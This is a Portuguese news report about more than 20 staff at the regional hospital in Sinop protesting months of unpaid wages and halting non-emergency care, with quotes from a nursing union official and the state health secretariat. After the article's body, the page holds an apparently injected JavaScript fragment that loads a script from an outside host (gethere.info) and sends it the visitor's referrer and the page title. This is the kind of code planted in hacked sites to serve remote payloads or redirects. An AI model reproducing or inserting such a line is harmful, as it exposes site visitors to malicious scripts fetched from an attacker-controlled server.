Capa / Cidades / Sinop: profissionais cobram salários atrasados e paralisam parte de atendimentos no hospital regional

Sinop: profissionais cobram salários atrasados e paralisam parte de atendimentos no hospital regional

Fonte: Só noticias

Mais de 20 profissionais protestaram, esta tarde, com cartazes, em frente ao Hospital Regional, cobrando da Secretaria Estadual de Saúde o  pagamento dos salários atrasados. Alguns profissionais não recebem desde julho do ano passado. A representante, na região Norte, do Sindicato dos Profissionais de Enfermagem de Mato Grosso, Ivone Oberdenge, explicou, ao Só Notícias, que “todo o corpo clínico do Hospital Regional paralisou as atividades. Apenas os atendimentos de emergência estão sendo realizados”.

A paralisação é por tempo indeterminado. “Precisamos de uma resposta do governo do Estado. Todas as alas hospital aderiram, funcionários contratados e os profissionais das empresas terceirizadas. Os atendimentos já foram reduzidos. Vamos cumprir apenas o  mínimo permitido até que o problema seja resolvido,” declarou.

A técnica em enfermagem Célia Regina dos Santos disse que está, há mais de dois meses, sem receber. “Precisamos receber. Não temos mais dinheiro para colocar combustível nos veículos para vir trabalhar. Até quando vamos ficar sem receber nossos salários ?. Nossas contas de água luz, aluguel então todas atrasadas”, apontou.

Em nota enviada ao Só Notícias, a assessoria de imprensa da secretaria informou que a quitação dos débitos começará na segunda-feira (3). “A SES ressalta que a equipe técnica está trabalhando para que todos os pagamentos sejam efetuados no menor prazo possível, a fim de que o atendimento na unidade hospitalar não seja interrompido”. De acordo com a assessoria, enfermeiros e faxineiros, por exemplo, que também estavam com atrasos, começaram a receber ontem. A falta de pagamento, neste caso, ocorreu, segundo a nota, “devido ao fechamento do exercício de 2015. Porém, todos os processos estão em procedimento de liquidação”.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top